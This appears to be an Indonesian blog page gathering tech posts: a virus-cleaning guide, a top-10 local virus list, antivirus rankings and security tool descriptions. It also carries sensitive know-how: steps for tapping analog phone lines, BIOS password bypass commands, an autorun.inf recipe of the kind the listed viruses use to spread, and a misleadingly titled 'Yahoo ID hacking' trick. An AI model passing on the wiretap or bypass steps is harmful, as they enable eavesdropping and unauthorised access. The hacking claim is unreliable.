Educational material in form of animations and illustrations explaining technical or abstract concepts about how the Internet Work. You can download it from here (71,2 MB) or another links from the original site. This video is for no-commercial only.
2. Install Wordpress
from CNET Video and WordPress Video Tutorial Courtesy of OptiNiche (need high bandwidth)
3. Install Drupal
Video Tutorial Drupal (77 MB) by Komunitas Drupal Indonesia
4. WindowsXP on Mac (Intel)
Video tutorial of how to install WindowsXP on an Intel Mac (58,7 MB)
6. Flash
gotoAndLearn, Free flash tutorial focuses on using Adobe Flash.
7. Hacking
Here is my favorites links
Hacking Illustrated
HackingDefined
antichat.ru (translate it using google translate)
8. News
(ops.. it is not about tutorial, it is News and need high bandwidth)
Liputan 6 (Indonesia News from SCTV)
CNET TV or CNET News
CNN Video
Yahoo News Video
9. Youtube
And of course you can also download more tutorial from youtube using keyword ‘tutorial’.


about link you can visit direcly :
http://chaidir.wordpress.com/

Trik-trik membersihkan Virus

Virus akan selalu menjadi momok selama kita masih punya komputer. Jadi kejadian ini pasti akan sering kita jumpai di sekitar kita. Menyambung dari tulisan ku yang terdahulu “Virus Lokal yang Nakal“. Setiap keluar virus jenis baru dengan karakteristik virus sedikit berbeda, pada awalnya pasti membikin heboh dan sempat gempar. lari kesana-sini untuk mencari penangkal virus tersebut.
Membersihkan virus dapat beresiko terhadap sistem operasi komputer kita bahkan sampai harus menginstal ulang komputer kita segala. Cara-cara menghilangkan virus dari komputer kita kadang berbeda antara satu virus dengan virus yang lainnya. Namun berikut ini akan saya berikan cara-cara membersihkan virus secara umum.

Prosedur membersihkan virus
Pastikan anda sudah memiliki backup data (walau terinfeksi virus) ini untuk menjaga-jaga bila proses pembersihan virus anda malah data anda ikut terhapus/ hilang. Dan pastikan anda sudah mempunyai emergency boot disk sistem anda.
* Cari tahu virus apa yang menyerang komputer anda.
1. Instal program anti virus jika di komputer anda belum terinstal antivirus. Cari antivirus yang menurut ada bagus dan manjur untuk jenis virus yang telah menyerang. (alangkah baiknya cari tau dan baca-baca tentang virus dan antivirusnya)
2. Pastikan virus definition yang paling Up date. Cari di internet dari webs site pembuat anti virus tersebut.
3. Usahakan setingan antivirus dalam mode hanya mendeteksi saja. Lebih baik jangan langsung menghapus file yang terinfeksi virus, kadang kala ada file system yang terinfeksi, dan file ini digunakan oleh OS untuk berjalan. Kalau file ini terhapus atau ter karantina bisa menyebakan sistem kacau atau malah tak jalan.
4. Scan virus tapi jangan menghapus nya terlebih dahulu. Catatan: beberapa virus bisa menghentikan program anti virus yang sedang berjalan di komputer. Untuk kasus ini bisa diakali dengan men-scan komputer tersebut lewat jaringan, dengan cara share drive yang akan di scan. Cara yang terakhir adalah dengan melepas harddisk dan di pasang di komputer yang akan digunakan untuk men-scan-nya.
Pelajari virus yang menjangkiti komputer anda dan cara menghapus-nya. Banyak web site yang menyediakan informasi ini. Seperti Symantec security response site contoh yang menyediakan informasi tentang virus dan cara membersihkan suatu virus tertentu.
* Hilangkan virus
1. Beberapa virus memiliki tool removal tersendiri untuk membersihkan-nya. Jika virus tersebut memiliki tool removal tersendiri download dan gunakan tool tersebut.
2. Jika tidak terdapat tool removal, pelajari dan lakukan cara pembersihan secara manual sesuai instruksi untuk jenis virus tersebut. Kamu mungkin harus menghapus secara manual file virus dan mengedit registry tertentu. Petunjuk penghapusan yang didapat dari sumber terpercaya akan menuntun kamu untuk melakukan step demi step untuk pembersihan virus tersebut.
3. Jika ada petunjuk untuk menggunakan scanning dari program antivirus untuk membersihkan virus tertentu, kemudian lakukan dengan men-scan dengan konfigurasi untuk menghapus (delete atau karantina) virus tersebut.
Tak pernah mencoba maka tak akan pernah mengalami kegagalan, kegagalan awal dari keberhasilan. Betul gak.


Selamat Mencoba

Teknologi Sederhana Untuk Menyadap Telepon

Menyadap pembicaraan orang adalah tindakan ilegal. Sampai saat ini pun, kegiatan penyadapan untuk proses penyidikan tidak dapat dilakukan sembarangan. Perlu dilengkapi dengan bukti yang cukup sampai sebuah lembaga boleh melakukan tindakan penyadapan.
Menyadap telepon merupakan pelanggaran hak asasi manusia yang diakui secara internasional. Artinya, aktivitas penyadapan telepon di manapun tidak dibenarkan. Aktivitas ini sudah pasti mengganggu privasi seseorang sehingga sangat ditentang. Namun di lain sisi, menyadap telepon dapat menjadi cara yang sangat efektif untuk mengetahui sebuah informasi yang sangat rahasia. Sehingga terkadang proses penyadapan dibenarkan. Khususnya untuk membantu proses penyelidikan pada kasus yang sangat berbahaya/besar. Aktivitas menyadap juga dapat menjadi cara yang efektif mengontrol penggunaan telepon. Bahkan sebagian orang ada juga yang menggunakan kegiatan menyadap ini sebagai salah satu sarana pencuran pulsa.
Yang paling besar memiliki kesempatan untuk melakukan aktivitas ini adalah perusahaan telekomunikasi. Karena di sanalah semua bentuk komunikasi bermuara. Namun, bukan berarti orang awam tidak dapat melakukannya. Proses penyadapan dapat dilakukan dengan sangat cepat dan mudah. Meskipun semakin sederhana, semakin mudah diketahui.
Kemudahan aktivitas sadap menyadap ini membuat seorang informan (penjahat maupun pemerintah) atau mata-mata melakukan komunikasi dengan menggunakan bahasa-bahasa sandi.
Pada Jaringan Analog
Seperti yang tadi telah diungkapkan bahwa menyadap adalah aktivitas yang sangat mudah dilakukan. Anda tidak perlu menjadi seorang detektif atau teknisi untuk dapat menyadap telepon. Bahkan anak-anak pun dapat dengan mudah melakukannya. Hanya saja tidak semua aktivitas penyadapan bisa dikatakan aman.
Aman atau tidaknya kegiatan penyadapan sangat bergantung kepada teknik dan perangkat yang digunakan. Semakin sederhana, maka semakin mudah diketahui. Sedangkan, tingkat kesulitan aktivitas ini sangat bergantung juga kepada sistem telekomunikasi yang digunakan oleh target atau korban.
Jaringan analog adalah yang paling rentan. Artinya, lebih mudah disadap dibandingkan jaringan telekomunikasi digital. Hal ini disebabkan dengan teknologi digital sinyal yang ditransmisikan kana terlebih dahulu melalui proses pengodean. Sehingga siapapun yang mencurinya tidak akan mudah mendengarkan suara yang sebenarnya. Karena harus terlebih dahulu mengubah kode-kode yang ada. Berbeda dengan sinyal analog yang bersifat langsung. Hal inilah yang memudahkan telekomunikasi dengan sinyal analog mudah dicuri. Karena seorang pencurinya tidak perlu repot mengubah atau membaca kode seperti pada transmisi digital.
Coba Anda bongkar pesawat telepon yang ada di ada di rumah. Dari boks saluran telepon sampai pesawat telepon hanya akan ada sebuah kabel dengan dua kawat tembaga di dalamnya yang dapat Anda temui. Biasanya kedua kawat tembaga ini dilapisi plastik yang berbeda warna satu sama lain. Satu kawat tembaga tempat mengalirnya sinyal ke dalam dan satu lagi untuk membawa sinyal keluar. Jika kedua kabel ini dikaitkan ke sebuah pesawat telepon lain, maka Anda dapat langsung mendengarkan percakapan pada telepon tersebut.
Konsep ini biasanya digunakan untuk rumah-rumah yang memasang teleponnya secara paralel hanya dengan bantuan spliter sederhana. Satu spliter dapat digunakan untuk memaralelkan sampai tiga telepon sekaligus, tergantung dari lubang keluarnya. Sedangkan lubang masuk hanya akan ada satu saja di belakangnya.
Adalah jumlah kabel yang sama yang akan Anda temui bila Anda membongkar sebuah gagang telepon biasa. Dan seperti layaknya pada sebuah spliter, Anda pun dapat menarik kabel dari dalam gagang tersebut untuk dapat mendengarkan pembicaraan. Masing-masing kabel mengalirkan sinyal ke speaker dan dari mikrofon.
Cara dan Alat
Dari keterangan tadi, tentu Anda sudah dapat membuat kesimpulan bahwa siapapun yang akan menyadap telepon Anda dapat melakukannya dengan dua cara. Melalui kabel di luar atau langsung dari gagang telepon.
Namun, perlu Anda ketahui bahwa kegiatan penyadapan tidak akan dikatakan kejahatan bila dilakukan sepengetahuan si pengguna telepon. Kegiatan ini hanya dapat digolongkan sebagai kegiatan kejahatan bila dilakukan tanpa sepengetahuan si pengguna telepon.
Penyadapan dapat saja sah bila dilaksanakan untuk kepentingan keamanan atau membatasi pembicaraan. Misalnya saja pada telepon umum. Jika penyadapan dilakukan pada telepon umum dengan meletakkan pemberitahuan yang jelas, maka si pengguna telepon umum tersebut pasti akan merasa canggung untuk melakukan pembicaraan berbau seks dan sara apalagi rencana kejahatan.
Untuk merekam atau menyadap pembicaraan yang seperti ini, Anda hanya perlu menyediakan alat-alat yang sederhana. Yaitu sebuah tape recorder, sebuah spliter, dan kabel telepon. Caranya cukup sambungkan sebuah spliter yang membelah antara peswat telepon yang akan disadap dengan satu kabel menuju tape recorder. Lalu jalankan selalu tape recorder setiap kali ada orang yang menggunakan telepon.
Jika ingin memudahkan pengoperasian, Anda dapat menambahkan sebuah sensor yang dapat membantu tape decoder untuk bekerja secara otomatis. Atau menggunakan tape decoder yang memiliki sensor suara. Sehingga tape hanya akan merekam bila ada pembicaraan saja.
Dengan cara ini, seseorang harus selalu rajin mengontrol isi tape. Jangan sampai kehabisan. Dan harus rajin untuk membolak-balik tape. Lain halnya jika menggunakan teknologi digital dan langsung menyimpan file pembicaraan ke komputer. Dengan cara ini, data dapat lebih banyak ditampung ketimbang dengan tape biasa. Sekarang ini sudah banyak komputer atau modem yang melengkapi paketnya dengan aplikasi telepon serta phone recorder.
Kriminal
Untuk kegiatan kriminal sendiri, cara seperti ini tidak pernah dilakukan, karena seorang pengguna telepon dapat mudah mengetahuinya. Apalagi jika telepon-telepon tersebut digunakan oleh orang–orang penting dengan staf keamanan yang terlatih.
Untuk kegiatan kriminal, kegiatan penyadapan dilakukan dengan lebih lihai. Misalnya saja dengan meletakkan sebuah alat pada boks saluran telepon agar tidak mudah terlihat. Atau jika ternyata telepon yang digunakan adalah telepon digital, maka bisa saja pengintai melakukan penyadapan dengan menggunakan alat kecil yang di sebut bug. Bug diletakkan pada gagang telepon.
Bug sifatnya tanpa kabel. Sehingga korban tidak akan mengetahui apakah teleponnya sedang disadap atau tidak. Bug berbentuk sangat kecil dan memiliki dua kaki kabel yang masing-masing melekat pada masing-masing kabel dalam gagang telepon. Bug mengirimkan datanya dengan bantuan frekuensi radio kepada receiver-nya. Data yang dikirimkan oleh bug dapat direkam atau dapat langsung didengarkan oleh penerima sinyal.
Keberadaan bug sangat popular saat ini dalam penyadapan telepon. Namun, bukan berarti bug tidak dapat dideteksi. Dengan alat sinyal detektor, keberadaan bug juga dapat diketahui. Dan sebagian yang memiliki staf keamanan yang tinggi dapat mengetahuinya. Sedangkan untuk orang yang terlalu lihai, biasanya tidak menyadari bahwa dirinya sedang disadap.
Sejak Perang Dunia Pertama
Kegiatan sadap menyadap sudah ada sejak masa perang dunia pertama. Pada awalnya memang untuk kebutuhan matamata pemerintahan sebuah negara. Namun, kemudian berkembang. Tidak hanya dunia peperangan dan politik saja yang melakukan kegiatan penyadapan. Dunia bisnis pun banyak dipenuhi dengan kegiatan penyadapan ini.
Oleh sebab itu, umumnya para mata-mata atau orang–orang tertentu yang merasa dirinya rawan dengan penyadapan sangat hati-hati dalam berbicara, umumnya mereka menggunakan kodekode tertentu dalam percakapan. Baik melalui telepon maupun tatap muka.
Hal ini disebabkan penyadapan tidak hanya dapat dilakuan secara fisik berdekatan dengan korban, tetapi juga dapat dilakuan tanpa jejak dengan menggunakan alat detektor khusus yang dapat ditembakkan dari jarak jauh.
Dan tidak hanya pembicaraan melalui telepon PSTN saja yang dapat disadap. Pembicaraan dengan menggunakan telepon genggam pun sangat rawan dengan penyadapan. Bahkan cenderung lebih mudah. Cukup dengan penyurian sinyal, maka penyadapan dapat dilakukan. Coba saja Anda gunakan sebuah pesawat radio xxx yang biasa digunakan oleh polisi dan penggemar radio amatir. Kadang mereka dapat secara tidak sengaja pembicaraan telepon yang dilakukan dengan ponsel.
Namun, lain halnya jika pembicaraan dilakukan dengan menggunakan telepon CDMA. Karena ada proses pengodean yang tidak terjadi pada pesawat GSM. Sehingga pembicaraan dengan telepon CDMA lebih aman. Tingkat keamanan pada CDMA sudah lebih dulu dikenal oleh dunia militer ketimbang masyarakat awam.
Apakah Telepon Anda juga Disadap?
Tagihan telepon melonjak atau Anda merasakan kualitas suara pembicaraan terasa aneh. Bisa saja telepon Anda tersadap. Namun, jangan terburu buruk sangka. Siapa tahu ternyata Anda sendirilah sebagai pelakukanya. Cobalah untuk memeriksa jaringan telepon di rumah. Bila Anda memaralelkan telepon hanya dengan menggunakan pembagi jaringan biasa hal tentu saja sangat rentan, karena siapa saja di ujung pesawat sana dapat mendengarkan percakapan Anda kapan saja.
Oleh sebab itu, bila Anda akan membagi jaringan di rumah atau ingin menggunakan lebih dari satu pesawat untuk satu nomor, Anda dapat menggunakan Mini PABX. Dengan alat ini, setiap saluran hanya akan digunakan oleh satu pesawat saja. Pesawat lain tidak dapat mendengarkan bila pesawat yang lain sudah menerimanya.
Dan bila ternyata setelah menggunakan Mini PABX kualitas suara tetap saja kurang baik atau kurang kuat, hubungi pusat pelayanan telepon untuk memintanya memeriksa jaringan telepon Anda di boks saluran telepon. Siapa tahu ada yang melakukan kecurangan di sana, atau ada saluran yang saling berinterferensi.
Tidak jarang persinggungan antarkabel pada perangkat penghubung juga dapat menyebabkan kebocoran yang artinya, Anda dapat mendengarkan pembicaraan orang lain atau sebaliknya orang lain dapat mendengarkan pembicaraan Anda.
Proses penyadapan yang sederhana selalu meninggalkan jejak. Oleh sebab itu, Anda tidak perlu khawatir. Lain halnya bila proses penyadapan dilakukan dengan alat yang lebih rumit. Misalnya dengan memasukkan bug ke dalam pesawat telepon. Hal ini tentu akan sulit dirasakan. Kecuali Anda membongkar pesawat Anda.

Sumber: Fadilla Mutiawarati (PC Media)

Top 20 Hacking Tools

Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol

TCPdump
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

DNSiff
DNSiff is a collection of tools for network auditing and penetration testing.
dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Ettercap
Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.

Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire
Tripwire is a tool that can be used for data and program integrity assurance.

Kismet
Kismet is an 802.11 wireless network sniffer - this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.

IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.
pf
OpenBSD Packet Filter

fport
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.

SAINT
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

source : hungryhacker

Cara Membuat Auto Run Di Flash Disk

buka notepad,

terus ketik gini:

[AUTORUN]
open=nama file.exe/.bat/ .com.

trs simpan di flashdisk dgn nama autorun.inf

coba deh..

nama file terserah.

misal ada setup.exe,

maka open=setup.exe

gitu deh klo gak salah.. :) tp bener kok..

cara untuk men-jebol password BIOS

cara yang paling sederhana akan saya bahas disini.

1. Menggunakan Password Standard atau "Backdoor

2. Flashing BIOS lewat Software.

> AMI/AWARD BIOS

O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q

3. Flashing BIOS lewat Hardware
Untuk men-jebol password BIOS lewat flashing hardware ada
beberapa cara diantaranya:

Menggunakan Jumper
Biasanya pada motherboard terdapat jumper yang fungsinya
untuk meng-clear BIOS. Letaknya dekat Battery BIOS (
bentuk-nya seperti battery jam tangan ) biasa-nya dilabeli
"CLR CMOS". Biasanya posisi jumper 1-2 adalah
kondisi normal, posisi 2-3 adalah posisi untuk meng-clear
BIOS. Pindah-kan Jumper pada posisi 2-3 (komputer harus
dalam keadaan mati!) diamkan sesaat, kemudian pindahkan lagi
ke posisi 1-2 (normal), hidupkan komputer. Karena BIOS-nya
di clear, maka harus dilakukan setting BIOS lagi, pilih saja
"LOAD OPTIMIZED DEFAULT" pada menu BIOS.

Mencabut Battery BIOS
Ya, cabut battery BIOS untuk beberapa saat setelah itu
pasang kembali. Sama seperti langkah diatas, cara ini juga
meng-clear BIOS sehingga lakukan lagi setting BIOS seperti
langkah diatas.

Trik Hacking Buka ID Yahoo Dan Gmail

Start >> Run…>> regedit
Buka HKEY_CURRENT_ USER >> Software >> yahoo >> pager >> test
Pada sebelah kanan, klik kanan >> New >> DWORD value
Beri nama Plural tekan enter 2 kali dan berikan nilai 1

sumber: http://onlinestoresurya.blogspot.com/

semoga bermamfaat

Mendisable Fungsi Regedit

Regedit atau kepanjangan dari Registry Editor pada Windows mempunyai fungsi untuk melihat, membuat atau memodifikasi registry di dalam Windows. Nah, karena fungsinya tersebut kadang-kadang disalahgunakan oleh orang-orang atau user yang tidak bertanggung jawab sehingga dapat membahayakan system registry di komputer Anda.
Langkah-langkahnya seperti biasa, masih menggunakan gpedit.msc yaitu Klik Start > Run > kemudian ketik gpedit.msc [...]

Saturday, October 11, 2008

Tips Bikin Themes Langsung di Ponsel

Beragam tema untuk bermacam ponsel kini bisa diperoleh dengan mudah. Bisa dengan membelinya di konten provider atau konter-konter download. Kita pun bisa mendownloadnya secara online di situs-situs penyedia konten. Bahkan, banyak pula situs yang menyediakan aplikasi tema ini secara gratis.

Selain cara diatas kita juga bisa membuat tema sendiri sesuai selera. Tapi, bagaimana dengan ponsel nokia s60 3rd editions yang notabene sistem operasinya baru, dengan kompatibilitas software masih sangat terbatas. Jangan khawatir, ada Theme DIY. Aplikasi pembuat tema khusus nokia s60 edisi ke 3 kreasi Zensis Ltd. Menariknya, aplikasi ini berjalan di ponsel, bukan lewat PC.

Aplikasi ini kompatible dengan Nokia N71, N73, N93, N92, E60, E61, E70, E50, 5500d,

Jika Anda Penasaran Klik Disini ajha...(Download ya)

10 Top AntiVirus

Bagi pengguna Internet dan komputer virus merupakan hal yang menakutkan. apalagi jika virus baru yang antivirus tercanggih sekalipun belum dapat mengenalinya seperti contohnya brontox waktu pertama keluar. namun tidak ada salahnya kita mencegah virus dengan antivirus karena beberapa diantaranya sudah mempunyai kemampuan heuristic yang dapat mengenali virus dari scriptnya sehingga jika ada virus baru bisa terbaca dari kode jahatnya dan langsung di blok seperti antivirus Nod32 yang saya miliki(promosi). dan di antara semua antivirus manakah yang terbaik? langsung saja kita lihat:
Catatan: Hasil ini diambil dari test yang dilakukan PCWorld yaitu majalah komputer terkenal di dunia
10.Norton Antivirus:
Kemudahan Penggunaan: Luar Biasa(10)
Keampuhan: Sangat Baik(8)
Kemudahan Updates: Baik(7)
Kelengkapan Feature: Sangat Baik(8)
Kemudahan Instalasi: Baik(7)
Help And Support:Sangat Baik(8)
9.Norman Antivirus:
Kemudahan Penggunaan: Sangat Baik(8)
Keampuhan: Baik(7)
Kemudahan Updates: Sangat Baik(9)
Kelengkapan Feature: Sangat Baik(8)
Kemudahan Instalasi: Luar Biasa(10)
Help And Support:Sangat Baik(9)
8.CA Antivirus:
Kemudahan Penggunaan: Sangat Baik(9)
Keampuhan: Luar Biasa(10)
Kemudahan Updates: Sangat Baik(9)
Kelengkapan Feature: Cukup(5)
Kemudahan Instalasi: Luar Biasa(10)
Help And Support:Sangat Baik(8)
7.McAfee Virus Scan:
Kemudahan Penggunaan: Sangat Baik(9)
Keampuhan: Sangat Baik(9)
Kemudahan Updates: Sangat Baik(8)
Kelengkapan Feature: Sangat Baik9)
Kemudahan Instalasi: Sangat Baik(9)
Help And Support: Baik(7)
6.F Secure AntiVirus:
Kemudahan Penggunaan: Luar Biasa(10)
Keampuhan: Sangat Baik(8)
Kemudahan Updates: Sangat Baik(9)
Kelengkapan Feature: Sangat Baik(9)
Kemudahan Instalasi: Luar Biasa(8)
Help And Support:Luar Biasa(10)
5.AVG Antivirus:
Kemudahan Penggunaan: Luar Biasa(10)
Keampuhan: Sangat Baik(8)
Kemudahan Updates: Luar Biasa(10)
Kelengkapan Feature: Luar Biasa(10)
Kemudahan Instalasi: Luar Biasa(10)
Help And Support: Cukup(6)
4.Trend Micro:
Kemudahan Penggunaan: Luar Biasa(10)
Keampuhan: Sangat Baik(9)
Kemudahan Updates: Sangat Baik(9)
Kelengkapan Feature: Sangat Baik(9)
Kemudahan Instalasi: Luar Biasa(10)
Help And Support:Sangat Baik(8)
3.Eset Nod32:
Kemudahan Penggunaan: Sangat Baik(8)
Keampuhan: Luar Biasa(10)
Kemudahan Updates: Sangat Baik(9)
Kelengkapan Feature: Luar Biasa(10)
Kemudahan Instalasi: Luar Biasa(10)
Help And Support: Luar Biasa(10)
2.Kaspersky:
Kemudahan Penggunaan: Luar Biasa(10)
Keampuhan: Luar Biasa(10)
Kemudahan Updates: Luar Biasa(10)
Kelengkapan Feature: Luar Biasa(10)
Kemudahan Instalasi: Luar Biasa(10)
Help And Support: Luar Biasa(10)
1.BitDefender:
Kemudahan Penggunaan: Luar Biasa(10)
Keampuhan: Luar Biasa(10)
Kemudahan Updates: Luar Biasa(10)
Kelengkapan Feature: Luar Biasa(10)
Kemudahan Instalasi: Luar Biasa(10)
Help And Support: Luar Biasa(10)
Tambahan: Harga Paling Murah =Trend Micro ($16.5) Paling Mahal = F Secure AntiVirus ($65.9)
Bisa dilihat bahwa dari nilai BitDefender dan Kaspersky memiliki nilai yang sama!! tapi kenapa dimenangkan BitDefender yang menduduki peringkat pertama? tak lain dan tak bukan karena harga ($24.95 VS $34.95).

Friday, October 10, 2008

Trik Transfer Seketika Antara Rekening BCA dan Bank Lain

Saya memiliki kebutuhan untuk mentransfer dana secara seketika antar rekening dari beberapa bank yang berbeda. Biasanya tidak menjadi masalah karena umumnya bank-bank ini tergabung dalam jaringan ATM Bersama. Masalah baru timbul jika transaksi melibatkan BCA. BCA adalah salah satu bank yang nasabahnya paling banyak di Indonesia, dan dengan demikian cukup banyak transaksi yang melibatkan BCA. Sayangnya BCA adalah satu-satunya bank yang tidak tergabung dalam jaringan ATM Bersama.

Jika ingin mentransfer dana dari atau ke BCA, solusinya hanyalah dengan SKN yang dananya baru efektif tertransfer setelah dua atau tiga hari. Alternatif lain adalah dengan RTGS yang lebih cepat dari SKN (transaksi selesai maksimal satu hari kerja), tapi tidak seketika sebagaimana transaksi ATM Bersama. Selain itu biayanya bisa jadi jauh lebih mahal daripada ATM Bersama atau SKN, apalagi jika dana yang ditransfer tidak berjumlah besar.

Trik saya untuk bisa melakukan transfer dari dan ke rekening BCA secara seketika adalah dengan membuka rekening bank lain yang terhubung pada jaringan ATM Bersama dan sekaligus juga jaringan Prima (jaringan ATM milik BCA). Rekening bank yang saya pakai adalah Shar-e dari Bank Muamalat. Rekening Shar-e bisa dibuka melalui kantor pos terdekat dengan dana sebesar Rp 125 ribu saja. Selain itu Shar-e tidak mengenakan biaya administrasi jika jumlah dana di atas Rp 100 ribu sehingga cocok untuk keperluan saya yang hanya akan menggunakan rekening ini sebagai perantara.

Jika misalnya saya ingin mentransfer dana dari Bank Mandiri ke BCA secara seketika, saya cukup mencari tempat dimana ada ATM Bersama dan ATM BCA sekaligus (tidak sulit mencari tempat seperti itu). Untuk melakukannya, pertama saya transfer dana dari Bank Mandiri ke Shar-e melalui jaringan ATM Bersama (dikenakan biaya Rp 5000), dan setelah itu dana saya transfer dari Shar-e ke BCA melalui ATM BCA (dikenakan biaya Rp 5000). Total biaya yang dikeluarkan adalah Rp 10 ribu. Maksimum besar transaksi adalah Rp 5 juta. Sedangkan batas transaksi maksimum per hari adalah Rp 10 juga, tapi saya dengar batasan ini sudah dinaikkan menjadi Rp 25 juta.

Thursday, October 09, 2008

Top 10 Virus, Juli 2008

Populasi virus baru di periode ini dirasakan menurun dibanding sebelumnya. Bisa jadi ini berkaitan dengan musim liburan sekolah. Namun demikian bukan berarti tanpa virus sama sekali, karena beberapa virus maker lokal masih mengeluarkan release virus baru hasil buatannya. Virus baru yang berhasil menduduki peringkat 10 besar kali ini ada Kalong.vbs.E, Godham, Ang.vbs.B, dan VCybe. Berikut daftar selengkapnya:


1. Quick

Virus berlambangkan mirip file video ini memiliki ukuran tubuh yang cukup kecil, yakni 19.456 bytes, dalam keadaan terkompresi menggunakan UPX. Pada komputer terinfeksi, di root drive system (C:) akan terdapat file induk virus dengan nama seperti ccinfo.exe, readme.txt, version.sys, windriver.exe, stba_cihampelas.3gp.exe, 3gp.sys, dan masih banyak lagi yang lainnya.


2. Kalong.vbs.E

Virus jenis VBScript ini telah lumayan lama malang melintang. Kini muncul varian terbaru dari virus ini yang dikenal dengan Kalong.vbs.E. Virus yang memiliki ukuran tubuh sebesar 5.908 bytes ini, dalam aksinya akan membuat file autorun.inf di setiap root drive yang ia temukan, tentunya untuk mempermudahnya dalam melakukan penyebaran. Selain file itu, Anda juga akan menemukan file dengan nama k4l0n62.sys.vbs, tentunya dengan attribut hidden. Pada komputer terinfeksi, ia pun akan menampakan kehadirannya pada caption Internet Explorer, dengan mengubahnya menjadi kata-kata cacian berbau pornografi.


3. Euis.B

Virus berlogokan lambang hati ini dibuat menggunakan Visual Basic, memiliki ukuran tubuh yang cukup besar, sekitar 1.929.216 bytes, atau 1,8Mb tanpa di-compress.Pada komputer terinfeksi, layar komputer Anda terkadang akan dipenuhi dengan message box yang bertuliskan “System Halted by Anti Spam of Siantar ! Contact service provider !”.


4. Ninta
Virus lokal yang menggunakan icon mirip file aplikasi Microsoft Word ini dibuat menggunakan Visual Basic. Ia memiliki ukuran tubuh sekitar 53.248 bytes tanpa di-packer. Saat komputer terinfeksi oleh virus ini, pada direktori System32 akan terdapat sebuah direktori baru lagi dengan nama F41 yang sebenarnya ber-attribut hidden. Pada direktori tersebut akan terdapat 2 buah file, yang pertama svchost.exe yang tak lain merupakan file induk virus, dan satu lagi adalah file MSVBVM60.dll. Kedua file ini juga dengan attribut hidden. Ia juga akan mencoba membuat file autorun.inf dan explorer.exe di setiap drive dan akan mem-blok akses ke Command Prompt, Find/Search, dan beberapa aplikasi lainnya yang memiliki caption seperti Process Viewer.

5. Godham
Virus yang memiliki ukuran sekitar 260Kb, murni tanpa di-packing ini dibuat menggunakan Visual Basic. Ia dapat merusak file-file Anda dengan menginfeksinya. File yang dapat ia infeksi adalah file gambar dengan extension .JPG dan file dokumen Word .DOC. Ia pun memiliki kemampuan untuk mengubah iconnya mengikuti file yang sedang diinfeksikannya, menjadi seperti file gambar, file dokumen Word, atau mirip folder. Virus ini akan menampakan diri dengan menampilkan tulisan “Ilegal program…….” pada aplikasi yang tidak diinginkannya. Dan jika pada properties file, di bagian Version Information terdapat kata-kata “Thank’s try is program is fun “GODHAM”“.


6. Marsand

Memiliki icon yang mirip dengan file gambar atau JPEG. Itulah virus Marsand, yang dibuat menggunakan Visual Basic, dan memiliki ukuran tubuh sebesar 36.864 bytes tanpa di-packer. Pada komputer terinfeksi, akan terdapat beberapa file induk virus pada direktori Windows dengan nama antara lain seperti, Marsanda.exe, serina.exe, dan BukitMerapin%.exe. Virus ini pun akan membatasi ruang gerak user dengan memanipulasi Registry Windows seperti menghilangkan menu Run dan Folder Options.

7. Alzheim

Virus yang memiliki ukuran tubuh sebesar 339.968 bytes ini dibuat menggunakan Visual Basic. Ia menggunakan icon mirip seperti file video yang biasanya digunakan oleh aplikasi Media Player Classic. Virus ini akan membuat beberapa file virus penggoda dengan nama-nama seperti anak SMU.exe, sexyvb.exe, smu purwokerto.exe, atau Cewek perawan.exe. Virus ini juga memblokir beberapa program yang ia anggap berbahaya, contohnya Regedit.exe. Jika user memaksa untuk menjalankannya, maka akan muncul pesan “Can not open this program. Your system maybe has been changed.”.

8. Ang.vbs.B

Virus jenis VBScript ini memiliki ukuran file sebesar 7.292 bytes. Ia akan menginfeksi registry userinit untuk dapat running otomatis. Pada komputer terinfeksi, ia pun akan menghapus default caption dan URL pada Internet Explorer. Dan tak lupa ia juga menciptakan file autorun.inf pada drive yang ada untuk memudahkannya dalam menyebarkan diri

9. VCybe

Memiliki ukuran file sebesar 162.304, terkompresi menggunakan UPX. Virus yang berlambangkan mirip seperti aplikasi Microsoft Word ini juga dibuat menggunakan Visual Basic. Pada komputer terinfeksi, akan terdapat file VCybe.txt pada root drive atau pada direktori Windows. Beberapa fitur windows pun ia blokir, seperti contohnya Folder Options, Regedit, Command Prompt, dan Task Manager.


10. Discusx.vbs.B

Tidak ada perbedaan jauh antara varian yang satu ini dengan yang sebelumnya. Dia akan mencoba menginfeksi di beberapa drive di komputer Anda, termasuk drive flash disk, yang jika terinfeksi akan membuat file autorun.inf dan System32.sys.vbs pada root drive tersebut. Selain itu, ia pun akan mengubah caption dari Internet Explorer
menjadi “.::Discus-X SAY MET LEBARAN! [HAPPY LEBARAN ?!]::.”.

untuk lebih lengkap nya download disini (berbentuk dokumen / word.

